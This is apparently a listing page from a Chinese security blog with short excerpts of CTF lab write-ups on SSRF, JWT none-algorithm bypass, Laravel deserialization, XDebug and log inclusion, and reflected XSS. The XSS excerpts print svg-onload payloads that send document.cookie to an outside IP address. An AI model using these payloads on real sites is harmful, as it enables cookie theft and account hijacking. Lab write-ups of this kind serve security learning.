上一页 1 2 3 4 5 6 ··· 17 下一页
2025年5月21日
web351笔记(curl_init)
摘要: <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CUR 阅读全文
posted @ 2025-05-21 16:10 justdoIT* 阅读(13) 评论(0) 推荐(0)
2025年5月19日
Web346(None算法绕过签名)
摘要: 某些服务端并未校验JWT签名,可以尝试修改payload后然后直接请求token或者直接删除signature再次请求查看其是否还有效。 # typ:声明类型# alg:声明加密的算法 通常直接使用 HMAC SHA256需要注意的是因为header部分是固定的所以,生成的base64也是固定的以e 阅读全文
posted @ 2025-05-19 15:44 justdoIT* 阅读(100) 评论(0) 推荐(0)
Web345(None空加密算法-空加密算法(攻击头部不使用加密))
摘要: 解析JWT数据 JWT在线解析:https://jwt.io/ jwt利用工具 https://github.com/ticarpi/jwt_tool HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allo 阅读全文
posted @ 2025-05-19 14:51 justdoIT* 阅读(12) 评论(0) 推荐(0)
2025年5月16日
web466笔记(Laravel5.4版本)
摘要: Laravel5.4版本 ,提交数据需要base64编码https://xz.aliyun.com/news/10450#toc-0phpggc工具https://github.com/ambionics/phpggc ./phpggc -i Laravel/RCE2 Name : Laravel/ 阅读全文
posted @ 2025-05-16 16:16 justdoIT* 阅读(15) 评论(0) 推荐(0)
2025年5月3日
web320-web326(反射型-过滤空格)
摘要: 过滤空格用/代替空格 <svg/onload="window.location.href='http://120.46.25.3:8000/1.php?c='+document.cookie;"> 阅读全文
posted @ 2025-05-03 16:39 justdoIT* 阅读(8) 评论(0) 推荐(0)
web318-web319(反射型XSS-尝试<img>,<script>,<body>发现都被过滤)
摘要: 尝试<img>,<script>,<body>发现都被过滤,所以我们使用<svg>标签进行绕过https://xz.aliyun.com/news/3699 <svg onload=alert("xss");> <svg onload="window.location.href='http://12 阅读全文
posted @ 2025-05-03 16:07 justdoIT* 阅读(12) 评论(0) 推荐(0)
web317(反射XSS-过滤script)
摘要: 上一题的payload打不通,因为过滤了但不知道过滤了什么,将script换成body就成功了,说明过滤了script去掉script就回显成功 js中获取cookie的代码:document.cookie window.location.href:获取地址链接 <?php $cookie=$_GE 阅读全文
posted @ 2025-05-03 16:03 justdoIT* 阅读(22) 评论(0) 推荐(0)
2025年4月29日
web316(反射XSS-cookie)
摘要: 后台会每隔一段时间(一般为15秒)去访问一次我们的链接(毕竟要领10个鸡蛋bot要康康你的分享状态),当BOT访问我们的xss的时候我们就能拿到admin的cookie。 搭建在自己的网站上,写一段php代码即可,如 # xss.php <?php $cookie = $_GET['cookie'] 阅读全文
posted @ 2025-04-29 17:04 justdoIT* 阅读(21) 评论(0) 推荐(0)
2025年4月28日
web314(XDebug 远程调试漏洞)
摘要: 利用前提 目标开启了远程调试模式,并设置remote_connect_back = 1: xdebug.remote_connect_back = 1 xdebug.remote_enable = 1 利用原理 在上面的配置下,我们访问http://target/index.php?XDEBUG_S 阅读全文
posted @ 2025-04-28 17:18 justdoIT* 阅读(75) 评论(0) 推荐(0)
web314( 日志包含)
摘要: <?php error_reporting(0); highlight_file(__FILE__); //phpinfo $file = $_GET['f']; if(!preg_match('/\:/',$file)){ include($file); } 过滤了冒号,也就是说伪协议不行了,那么 阅读全文
posted @ 2025-04-28 16:46 justdoIT* 阅读(11) 评论(0) 推荐(0)
上一页 1 2 3 4 5 6 ··· 17 下一页